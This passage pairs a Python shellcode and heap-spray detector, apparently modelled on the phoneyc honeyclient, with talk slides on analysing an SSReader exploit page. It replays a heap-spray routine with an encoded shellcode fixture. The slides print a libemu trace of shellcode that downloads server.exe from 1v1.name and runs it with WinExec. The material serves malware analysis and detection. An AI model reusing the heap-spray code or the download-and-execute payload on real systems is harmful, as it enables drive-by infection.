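    """JavaScript unescape(): %uXXXX and %XX become single UTF-16 code units."""
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def string_bytes(js_string: str) -> bytes:
    """SpiderMonkey stores string data as 16-bit jschars; this is the byte
    image the interrupt handler would hand to libemu."""
    return js_string.encode("utf-16-le", "surrogatepass")


# Minimal stand-in for libemu's GetPC heuristics: self-locating sequences
# that position-independent code uses to learn its own address.
GETPC_PATTERNS = [
    re.compile(rb"\xe8\x00\x00\x00\x00[\x58-\x5f]"),  # call $+5 ; pop reg
    re.compile(rb"\xd9\x74\x24\xf4"),                 # fnstenv [esp-0xc]
]


def shellcode_offset(data: bytes) -> int:
    """Offset of the first GetPC sequence, or -1.  In phoneyc this check is
    libemu's emu_shellcode_test() (name from libemu's API, not the page)."""
    hits = [m.start() for p in GETPC_PATTERNS for m in [p.search(data)] if m]
    return min(hits) if hits else -1


class AssignmentTracer:
    """Models the JS_SetInterrupt handler: called once per bytecode with the
    opcode and, for set* opcodes, the lvalue name and the r-value on top of
    the stack."""
    HEAPSPRAY_HITS = 50  # assumed threshold; the page only shows HIT: 100

    def __init__(self):
        self.hits = Counter()  # lvalue -> shellcode-carrying assignments
        self.found = {}        # lvalue -> (GetPC offset, size) of first hit

    def on_bytecode(self, opcode: str, lvalue: str, rvalue) -> bool:
        if opcode not in SET_OPCODES or not isinstance(rvalue, str):
            return False
        data = string_bytes(rvalue)
        off = shellcode_offset(data)
        if off < 0:
            return False
        self.hits[lvalue] += 1
        self.found.setdefault(lvalue, (off, len(data)))
        return True

    def alerts(self):
        """(lvalue, label, hit count), mirroring the [ALERT] lines on slide 27."""
        out = []
        for lvalue, n in self.hits.items():
            label = "Shellcode Detected"
            if n >= self.HEAPSPRAY_HITS:
                label = "Shellcode & Potential heapspray sledge"
            out.append((lvalue, label, n))
        return out


# Constructed stand-in for the elided shellcode: NOPs, a call $+5 / pop ebx
# GetPC stub, then the URL tail quoted on slide 6.  A detection fixture only.
STUB = "%u9090%u9090%u00e8%u0000%u5b00"
URL_TAIL = ("%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61"
            "%u2f65%u6573%u7672%u7265%u652e%u6578%u0000")


def run_sample(tracer: AssignmentTracer) -> AssignmentTracer:
    """Replay the heapspray script of slides 6-7 as the set* events the
    SpiderMonkey hook would observe."""
    shellcode = js_unescape(STUB + URL_TAIL)
    tracer.on_bytecode("setname", "shellcode", shellcode)
    bigblock = js_unescape("%u9090%u9090")
    slackspace = 20 + len(shellcode)  # headersize + shellcode.length
    while len(bigblock) < slackspace:
        bigblock += bigblock
    fillblock = bigblock[:slackspace]
    tracer.on_bytecode("setname", "fillblock", fillblock)
    block = bigblock[:len(bigblock) - slackspace]
    while len(block) + slackspace < 0x40000:
        block = block + block + fillblock
        tracer.on_bytecode("setname", "block", block)
    for x in range(100):  # memory[x] = block + shellcode
        tracer.on_bytecode("setelem", "memory[x]", block + shellcode)
    return tracer


if __name__ == "__main__":
    for lvalue, label, n in run_sample(AssignmentTracer()).alerts():
        print(f"[ALERT] {lvalue} -> {label} HIT: {n}")
```

The pure NOP strings (fillblock, block) never trip the check; only the assignments whose r-value carries the GetPC stub are counted, and the 100 memory[x] assignments cross the threshold and get the heapspray label.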
  • 26. A Run on ssreader_0day.html I
    joyan@Jdeb:~/code/phoneyc$ sh go.sh
    HONEYCLIENT MODULE TEST
    fetching http://172.31.25.227/phoneyc/ssreader_0day.html
    []
    ==> http://172.31.25.227/phoneyc/ssreader_0day.html
    JS EVAL
    Executing Javascript:
    DEBUG: !!!SC DETECTED at 141847268=141847572size:374
    DEBUG: !!!SC DETECTED at 141847524=141847756size:32728
    DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
    DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
    ...
    DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
    SSReader Pdg2 Register method overflow
    [ALERT] 0: 141847268 -> Shellcode Detected HIT: 1
    Runing shellcode... offset:248
    DEBUG: Begin analyzing ...
    DEBUG: download http://1v1.name/server.exe -> c:\WINDOWS\system32\a.exe
  • 27. A Run on ssreader_0day.html II
    ...
    URLs:['http://1v1.name/server.exe', 'http://1v1.name/server.exe']
    Done
    [ALERT] 0: 141847524 -> Shellcode Detected HIT: 1
    [ALERT] 0: 141723488 -> Shellcode & Potential heapspray sledge HIT: 100
    VBS EVAL
    IFRAMES []
    HREFS []
    FRAMES []
    IMAGES []
  • 28. Analysis of The Shellcode using libemu I
    FARPROC WINAPI GetProcAddress (
        HMODULE hModule = 0x7c800000 =>
            none;
        LPCSTR lpProcName = 0x0041710c =>
            = "GetSystemDirectoryA";
    ) = 0x7c814eea;
    FARPROC WINAPI GetProcAddress (
        HMODULE hModule = 0x7c800000 =>
            none;
        LPCSTR lpProcName = 0x00417120 =>
            = "WinExec";
    ) = 0x7c86136d;
    FARPROC WINAPI GetProcAddress (
        HMODULE hModule = 0x7c800000 =>
            none;
        LPCSTR lpProcName = 0x00417128 =>
            = "ExitThread";
    ) = 0x7c80c058;
    FARPROC WINAPI GetProcAddress (
        HMODULE hModule = 0x7c800000 =>
  • 29. Analysis of The Shellcode using libemu II
            none;
        LPCSTR lpProcName = 0x00417133 =>
            = "LoadLibraryA";
    ) = 0x7c801d77;
    HMODULE LoadLibraryA (
        LPCTSTR lpFileName = 0x00417140 =>
            = "urlmon";
    ) = 0x7df20000;
    FARPROC WINAPI GetProcAddress (
        HMODULE hModule = 0x7df20000 =>
            none;
        LPCSTR lpProcName = 0x00417147 =>
            = "URLDownloadToFileA";
    ) = 0x7df7b0bb;
    UINT GetSystemDirectory (
        LPTSTR lpBuffer = 0x0012fe5f =>
            none;
        UINT uSize = 32;
    ) = 19;
    HRESULT URLDownloadToFile (
  • 30. Analysis of The Shellcode using libemu III
        LPUNKNOWN pCaller = 0x00000000 =>
            none;
        LPCTSTR szURL = 0x0041715a =>
            = "http://1v1.name/server.exe";
        LPCTSTR szFileName = 0x0012fe5f =>
            = "c:\WINDOWS\system32\a.exe";
        DWORD dwReserved = 0;
        LPBINDSTATUSCALLBACK lpfnCB = 0;
    ) = 0;
    UINT WINAPI WinExec (
        LPCSTR lpCmdLine = 0x0012fe58 =>
            = "cmd /c c:\WINDOWS\system32\a.exe";
        UINT uCmdShow = 0;
    ) = 32;
  • 31. Thank you!